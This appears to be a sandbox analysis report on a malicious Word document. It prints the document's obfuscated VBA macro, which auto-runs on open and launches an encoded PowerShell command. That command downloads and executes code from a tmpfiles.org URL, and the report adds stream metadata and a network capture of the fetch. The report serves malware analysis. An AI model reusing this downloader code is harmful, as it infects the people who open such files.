'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
KbR = "P": dTeRavdQLFiaRCHrHyuXdeHybQeFIYC = "o": DLszaNoPwSTucJvPenyIHhc = "w": wIZODYVPDCMy = "e": JAusDBfPdQy = "r": duEZDXrOJdeWkYVtTepnzoLHCY = "s": Cf = "h": WXdwDWONPKC = "e": avchVXNDYcPYTstAYhuGKhrTaTF = "l": eUoiAJtFvyGJNebIdK = "l":
'VrYIweaXzFDiXhfXpVoMWSuUTosuuwDpCKceik
'VprcMvTybtWCrceoHvvQyDD  IfHBhDnuXCPPOTzOEwVa
'HZLVpOHOvAFOPHKCOiiAoKd  WFnhePfKQR
'oQcNNwneBDkaphvLVEeeiRIMsGzUVGWYLwIWdREvmvAZbCPPTAPKp sAUsICOuRHVAkoJLyAHGFPSyN
With Selection
.Borders(xlDiagonalDown).LineStyle = xlNone
.Borders(xlDiagonalUp).LineStyle = xlNone
.Borders(xlEdgeLeft).LineStyle = xlNone
.Borders(xlEdgeTop).LineStyle = xlNone
.Borders(xlEdgeBottom).LineStyle = xlNone
.Borders(xlEdgeRight).LineStyle = xlNone
.Borders(xlInsideVertical).LineStyle = xlNone
.Borders(xlInsideHorizontal).LineStyle = xlNone
End With
With Application.FileSearch
.NewSearch
'Change path to suit
.LookIn = "WFnhePfKQR"
.FileType = msoFileTypeExcelWorkbooks
If .Execute > 0 Then
For lCount = 1 To .FoundFiles.Count
Set wbResults = Workbooks.Open(FileName:=.FoundFiles(lCount), UpdateLinks:=0)
wbResults.Close SaveChanges:=True
Next lCount
End If
End With
Application.ScreenUpdating = True
Application.DisplayAlerts = True
'WFnhePfKQR  DaIWJdWiZZvwD
'  yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI  RrEFfsdBSDRSvDUIiatMvCDoUcGQekfhMSSiJpkUiVEUzXHRSbXAVKCnSvLdPotptLfyMwYXSDEtZKyXBPYdwwvdtYrydf
' YbzCBveVatYsAUTyQCGXiuehbzWOeYr
'XaiAZGbTUWBFpSreBHFnfEsUYcLad
'baTEDvFnPTPpuJoaLzhYw
'hZFHaVcOKPdUrAuXVvOJs
'RrEFfsdBSDRSvDUIiatMvCDoUcGQekfhMSSiJpkUiVEUzXHRSbXAVKCnSvLdPotptLfyMwYXSDEtZKyXBPYdwwvdtYrydf
Dim MwGaJWMtUaonakiksIhs As Long
'MsgBox Prompt:="IfHBhDnuXCPPOTzOEwVa?", Buttons:=DaIWJdWiZZvwD , Title:="YbzCBveVatYsAUTyQCGXiuehbzWOeYr   "
'ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe

'   khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI
Dim r As Long, x As Long
For x = 2 To r Step 1
r = r - 1
Next x
'zXJRDVFfnEbUETkMdMFHN
'WFnhePfKQR  ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
'zXJRDVFfnEbUETkMdMFHN
'WFnhePfKQR   IfHBhDnuXCPPOTzOEwVa
'LYfutprNPzcESQiHeZEdwZRYwQrdXNWAnMoNJSvTwKoQhpNWIVVRIeMpiKGGVQRcCHpKDzXvOKyFncSbI   DaIWJdWiZZvwD
'khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI  yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'WFnhePfKQR  ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
wkFG = KbR + dTeRavdQLFiaRCHrHyuXdeHybQeFIYC + DLszaNoPwSTucJvPenyIHhc + wIZODYVPDCMy + JAusDBfPdQy + duEZDXrOJdeWkYVtTepnzoLHCY + Cf + WXdwDWONPKC + avchVXNDYcPYTstAYhuGKhrTaTF + eUoiAJtFvyGJNebIdK + "  -e  SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"""""
'ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
' ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
Dim PcLEMdZaBZ As Long
Dim rhcIhwX As String
Dim dfC As Long






'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG








zXJRDVFfnEbUETkMdMFHN = "W": nYXOavcKzIMpBcpPTUXXH = "S": wYvKDGFpELyFyvwTfdsoC = "c": hZFHaVcOKPdUrAuXVvOJs = "r": baTEDvFnPTPpuJoaLzhYw = "i": EXrVaGcGkBrFHKhIoEivS = "p": IWcZEvFbdtKpLBfEDsOWX = "h": MVOcbVdCYnYUNudBNksGd = "t": WFnhePfKQR = ".":
UUh = "s":
YUQGTcCcXIokXZANQUPNKA = "e": 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
zFKcHMiERAysafHJOIRHWNTtno = "l": 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
UwFFnsSaLuaDdvPFLsSAibHYWr = "l" 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
KbR = zXJRDVFfnEbUETkMdMFHN + nYXOavcKzIMpBcpPTUXXH + wYvKDGFpELyFyvwTfdsoC + hZFHaVcOKPdUrAuXVvOJs + baTEDvFnPTPpuJoaLzhYw + EXrVaGcGkBrFHKhIoEivS + MVOcbVdCYnYUNudBNksGd + WFnhePfKQR + UUh + IWcZEvFbdtKpLBfEDsOWX + YUQGTcCcXIokXZANQUPNKA + zFKcHMiERAysafHJOIRHWNTtno + UwFFnsSaLuaDdvPFLsSAibHYWr
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'wHrUtRPzQDKoZdXKKCGphYZeQaHIRfOkuNQWfOnbCQZwBZKwhadU
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
Set RsoXaQzRZLepceHbdJWVCWvy = CreateObject(KbR)  'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
RsoXaQzRZLepceHbdJWVCWvy.Run wkFG, 858235310:
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
'Declare your variables
        Dim yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh As Range
        Dim ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe As Range
    'Save the Workbook before changing cells
        Select Case MsgBox("Can't Undo this action.  " &                             "Save Workbook First?", vbYesNoCancel)
            Case Is = vbYes
            ThisWorkbook.Save
            Case Is = vbCancel
            Exit Sub
        End Select
    'Define the target Range.
        Set MyRange = Selection
    'Start looping through the range.
        For Each MyCell In MyRange
    'Trim the Spaces.
            If Not IsEmpty(MyCell) Then
                MyCell = Trim(MyCell)
            End If
    'Get the next cell in the range
        Next MyCell
   
End Sub

VBA File Name: ThisDocument.cls, Stream Size: 203

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	203
Data ASCII:	. . . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . S u b q _ O p . e n ( ) . . a w . n d j f a w d w @ d . . E n d . . . .
Data Raw:	01 c7 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
awndjfawdwd
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 118

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	118
Entropy:	4.268110596474915
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F $ . . . D o c u m e n t o d o M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 24 00 00 00 44 6f 63 75 6d 65 6e 74 6f 20 64 6f 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 260

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	260
Entropy:	2.3390993345415625
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . t . u . l . o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 0a 00 00 00 01 00 00 00 58 00 00 00 0b 00 00 00 60 00 00 00 11 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 0c 00 00 00 7c 00 00 00 05 00 00 00 a4 00 00 00 10 00 00 00 ac 00 00 00 06 00 00 00 b4 00 00 00 0d 00 00 00 bc 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 512

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	512
Entropy:	2.8735362928076102
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . i . a . g . o . . O . l . i . v . e . i . r . a . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . h ( i c . . . .
Data Raw:	fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 01 00 00 12 00 00 00 01 00 00 00 98 00 00 00 04 00 00 00 a0 00 00 00 10 00 00 00 c8 00 00 00 06 00 00 00 d0 00 00 00 0c 00 00 00 dc 00 00 00 05 00 00 00 e8 00 00 00 0b 00 00 00 f4 00 00 00 08 00 00 00 00 01 00 00 0d 00 00 00 28 01 00 00

Stream Path: 1Table, File Type: data, Stream Size: 2934

General
Stream Path:	1Table
CLSID:
File Type:	data
Stream Size:	2934
Entropy:	3.181520705565234
Base64 Encoded:	False
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
Data Raw:	6a 04 0f 00 12 00 01 00 0b 01 0f 00 00 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 218

General
Stream Path:	Macros/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	218
Entropy:	4.978459919366058
Base64 Encoded:	True
Data ASCII:	I D = " { 1 8 E 2 6 B 3 B - 0 E 2 5 - 4 6 A 3 - 8 C 3 D - 3 C 9 6 D A D 6 8 0 C 7 } " . . D o c u m e n t = T h i s D o c u m e n t . . M o d u l e = N e w M o d u l e . . N a m e = " P r o j e c t " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 3 3 C 1 3 7 C 1 3 7 C 1 3 7 C 1 3 7 " . . D P B = " D A D 8 3 1 C 1 3 2 C 2 3 2 C 2 3 2 " . . G C = " D C D E 3 7 C B 3 B C C 3 C C C 3 C 3 3 " . .
Data Raw:	49 44 3d 22 7b 31 38 45 32 36 42 33 42 2d 30 45 32 35 2d 34 36 41 33 2d 38 43 33 44 2d 33 43 39 36 44 41 44 36 38 30 43 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 6f 64 75 6c 65 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33 32 3d 22 33 39 33 32 32

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7

General
Stream Path:	Macros/VBA/_VBA_PROJECT
CLSID:
File Type:	ISO-8859 text, with no line terminators
Stream Size:	7
Entropy:	1.8423709931771088
Base64 Encoded:	False
Data ASCII:	a . . .
Data Raw:	cc 61 ff ff 00 00 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 529

General
Stream Path:	Macros/VBA/dir
CLSID:
File Type:	data
Stream Size:	529
Entropy:	6.335437239038614
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . _ , f . . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ S y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c . E C . . . . } \\ , f . ! O f f i c g O . f . i . c g . . g 2 D F 8 . D 0 4 C - 5
Data Raw:	01 0d b2 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 15 5f 2c 66 06 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 3630

General
Stream Path:	WordDocument
CLSID:
File Type:	data
Stream Size:	3630
Entropy:	0.7564027997021255
Base64 Encoded:	False
Data ASCII:	. ! ` . . . . . . . . . . . . . . . . . . . . . . . . . . A W N . 2 4 . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . > . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . .
Data Raw:	ec a5 c1 00 21 60 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 41 57 4e 00 32 34 2e 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 3e c7 00 00 3e c7 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 17:10:09.477371931 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:10:09.477468014 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:09.477571964 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:10:09.484481096 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:10:09.484494925 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:09.949619055 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:09.949683905 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:10:09.954649925 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:10:09.954655886 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:09.955302000 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:09.974868059 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:10:10.015337944 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:10.489754915 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:10.489862919 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:10.489900112 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:10.489938021 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:10.489955902 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:10:10.489965916 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:10.489983082 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:10:10.490005016 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:10.490068913 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:10:10.490078926 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:10.490091085 CET	443	49712	104.21.21.16	192.168.2.5
Jan 1, 2025 17:10:10.490140915 CET	49712	443	192.168.2.5	104.21.21.16
Jan 1, 2025 17:10:10.495316029 CET	49712	443	192.168.2.5	104.21.21.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 17:10:09.455256939 CET	52873	53	192.168.2.5	1.1.1.1
Jan 1, 2025 17:10:09.472992897 CET	53	52873	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 17:10:09.455256939 CET	192.168.2.5	1.1.1.1	0x1dbd	Standard query (0)	tmpfiles.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 17:10:09.317387104 CET	1.1.1.1	192.168.2.5	0xa015	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 1, 2025 17:10:09.317387104 CET	1.1.1.1	192.168.2.5	0xa015	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 1, 2025 17:10:09.472992897 CET	1.1.1.1	192.168.2.5	0x1dbd	No error (0)	tmpfiles.org	104.21.21.16	A (IP address)	IN (0x0001)	false
Jan 1, 2025 17:10:09.472992897 CET	1.1.1.1	192.168.2.5	0x1dbd	No error (0)	tmpfiles.org	172.67.195.247	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

tmpfiles.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	104.21.21.16	443	6980	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 16:10:09 UTC	88	OUT	GET /dl/18712758/rgvsozgu8x.jpg HTTP/1.1 Host: tmpfiles.org Connection: Keep-Alive
